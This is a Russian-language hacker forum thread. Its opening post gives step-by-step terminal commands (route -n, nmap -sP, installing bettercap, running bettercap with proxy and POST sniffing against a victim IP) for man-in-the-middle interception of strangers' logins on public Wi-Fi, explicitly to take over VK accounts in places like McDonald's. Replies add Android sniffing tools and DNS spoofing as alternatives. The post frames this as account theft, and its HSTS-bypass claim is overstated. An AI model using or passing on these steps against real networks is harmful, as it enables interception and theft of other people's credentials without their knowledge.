Bettercap HSTS BY PASS (Ломаем Вк в Макдональдсах)

Всем привет,сегодня расскажу как нормально спуффать юзеров в публичных Wi-Fi сетях

Без этого ебаного DNS спуффинга.

Если конечно нету VPN у юзера а то так не прокатит

Для начала надо понять в какой обоссаный Локальный IP у нашего Роутера

Пишем в терминале
________________________________
route -n
________________________________

Во вкладке Gateway IP роутера.

У меня 192.168.1.1

Дальше нужно понять какие клиенты есть на точке доступа.

__________________________________
nmap -sP IP/24
__________________________________

У вас будет клиентов дахера, но у меня только мой телефон

Дальше качаем bettercap (если нету)

______________________
apt-get install bettercap
______________________

Запускаем Сниффинг
______________________
bettercap -T IPжертвы --proxy -P POST
______________________

Теперь жуем Пиццу или что вы заказали и ждете

Профит ^_^

Потом сделаю тему, как заменить изображения на свои

Теперь упростим.Ставим root на свой смартфон,далее из Play Market скачиваем Network Utilities.Потом открываем приложение,выдаём root права,переходим во вкладку Sniffer включаем и радуемся жизни.

Не получиться,так как он сниффает только обычные сертификаты HTTP а вот этот способ спуффает и защищенные сайты!

Так что лучше не морочить себе голову и прийти нормально с Kali и разьебенить все аккаунты

только хотел проверить но вспомнил что сижу через VPN)

Ну как?Атака сработала?

Поставить Intercepter-ng для Android. Или выполнить тоже самое, что сделал автор, но на Android(Kali есть для Android). Вообще для таких атак существует несколько программ под Android.

Intercepter-ng тоже у меня имеется)

Ебать я звезда,мою тему дохера просмотрели)P.S Шучу

Ну свой пароль я украсть смог, осталось самое сложно - выбраться из дома и нормально затестить

А большинство людей сидят через приложения, их данные не перехватывает

Тогда DNS Spoof в помощь.

а можно установить root + Termux доложно работать